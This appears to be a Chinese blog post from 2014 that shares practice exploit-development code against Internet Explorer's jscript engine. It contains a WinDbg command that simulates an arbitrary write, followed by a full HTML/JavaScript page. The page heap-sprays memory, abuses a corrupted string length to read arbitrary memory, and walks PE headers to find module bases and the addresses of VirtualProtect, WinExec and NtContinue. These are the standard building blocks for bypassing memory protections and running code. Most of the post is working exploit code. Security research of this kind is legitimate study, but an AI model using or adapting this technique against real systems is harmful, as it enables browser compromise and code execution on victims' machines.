注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

信息泄漏测试,构造JS版GetProcAddress  

2014-10-27 13:32:52|  分类: 一些练习 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

从tk的pdf里拷出来,自己补充的。

下一个断点就行,就是模拟一个任意值写任意地址。

bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

以下是测试文件:

<!DOCTYPE HTML>
<HTML>
 <HEAD>
  <TITLE> InfoLeak Test2 </TITLE>
 </HEAD>

 <BODY>
  <SCRIPT LANGUAGE="JavaScript">
  <!--
  var block = "\u0000";

  // [ repeat the block to 512KB ]
  while (block.length < 0x40000){
   block += block;
  }

  // [ Allocate 200 MB ]
  var slide = new Array();
  for (var i = 0; i < 400; i++){
   slide[i] = block.substr(0,block.length);
  }
  // alert("heapspary done");

  var spryaddr = 0x0c0c0c0c;
  var i, p, modified, leakstr, lenaddr;

  Math.atan2(spryaddr, 0x11223344);// bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

  // =ed=
  // $t1=0c0c0c0c
  // $t2=11223344

  for (i = 0; i < slide.length; i++) {
   p = slide[i].search(/[^\u0000]/);
   if (p != -1) {
    modified = i;
    leakstr = slide[modified];
    lenaddr = spryaddr - (p)*2 - 4;
    break;
   }
  }
  alert(lenaddr.toString(16));

  Math.atan2(lenaddr, 0x7ffff000);// bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

  // =ed=
  // $t1=0c060020
  // $t2=7ffff000

  var testaddr = 0x3e389ad2;

  alert(leakstr.length.toString(16));
  alert(escape(leakstr.substr((testaddr-lenaddr-4)/2, 8)));

  function readDword(address) // address % 2 == 0
  {
   var str = leakstr.substr((address-lenaddr-4)/2, 2);
   return (str.charCodeAt(1)<<16 | str.charCodeAt(0));
  }

  function GetBaseAddrByPoiAddr( PoiAddr )
  {
   var BaseAddr = 0;
   BaseAddr = PoiAddr & 0xFFFF0000;
   while( readDword(BaseAddr)     != 0x00905A4D ||
       readDword(BaseAddr+0xC) != 0x0000FFFF    )
   {
    BaseAddr -= 0x10000;
   }
   return BaseAddr;
  }
  
  function astr2jstr(astraddr)
  { 
   var str,a,i=0,s="";
   a=(astraddr%2)?astraddr-1:astraddr;
   str = leakstr.substr((a-lenaddr-4)/2, 32);

   if (astraddr % 2 !=0)
   {
    w=str.charCodeAt(i);
    if (w >>8 ) {s=s+"%u00"+(w >> 8).toString(16);i++;} else return s;
   }

   for (; i<str.length; i++)
   {
    w=str.charCodeAt(i);
    if (w & 0xff) s=s+"%u00"+(w & 0xff).toString(16); else break;
    if (w >>8 ) s=s+"%u00"+(w >> 8).toString(16); else break;
   }
   return (unescape(s));
  }

  //alert( "astr2jstr="+astr2jstr(testaddr) );

  function GetModuleFromImport( ModuleName, LibAddr )
  {
   var p   = 0;
   var pImport;  // PIMAGE_IMPORT_DESCRIPTOR
   p = readDword(LibAddr + 0x3C);
   p = readDword(LibAddr + p + 0x80);
   pImport = LibAddr + p;
   while( readDword(pImport+0x0C) != 0 )
   { 
    if (ModuleName.toLowerCase()==astr2jstr(LibAddr+readDword(pImport+0x0C)).toLowerCase())
    { 
     p = LibAddr + readDword(pImport+0x10);
     p = readDword(p+0x10);
     return GetBaseAddrByPoiAddr(p);
    }
    pImport+=0x14;
   }
  }


  function GetProcAddress( LibAddr, ProcName )
  {
   var FuncAddr;
   var pExport;
   var pNameBase;
   var AddressOfNameOrdinals;
   var i;

   p = readDword(LibAddr + 0x3C);
   p = readDword(LibAddr + p + 0x78);
   pExport = LibAddr + p;
   NumberOfNames = readDword(pExport + 0x18);
   pNameBase = LibAddr + readDword(pExport + 0x20);

   for (i=0; i < NumberOfNames; i++)
   { 
    p=LibAddr+readDword(pNameBase+4*i);
    if (ProcName.toLowerCase()==astr2jstr(p).toLowerCase())
    {
     break;
    }
   }

   //alert( i+"==="+astr2jstr(LibAddr+readDword(pNameBase+4*i)) );

   t5 = LibAddr + readDword(pExport + 0x24);
   t5 = readDword(t5 + 2*i) & 0xffff;
   t6 = LibAddr + readDword(pExport + 0x1c);
   t6 = LibAddr + readDword(t6 + t5*4);
   
   return t6;
  }

  var jscript = GetBaseAddrByPoiAddr(testaddr);
  var kernel32 = GetModuleFromImport("kernel32.dll", jscript);
  var ntdll    = GetModuleFromImport("ntdll.dll", kernel32);
  var VirtualProtect = GetProcAddress(kernel32, "VirtualProtect");
  var WinExec        = GetProcAddress(kernel32, "WinExec");
  var NtContinue     = GetProcAddress(ntdll, "NtContinue");

  alert("jscript="+jscript.toString(16));
  alert("kernel32="+kernel32.toString(16));
  alert("ntdll="+ntdll.toString(16));
  alert("VirtualProtect="+VirtualProtect.toString(16));
  alert("WinExec="+WinExec.toString(16));
  alert("NtContinue="+NtContinue.toString(16));

  //-->
  </SCRIPT>
 </BODY>
</HTML>

  评论这张
 
阅读(203)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017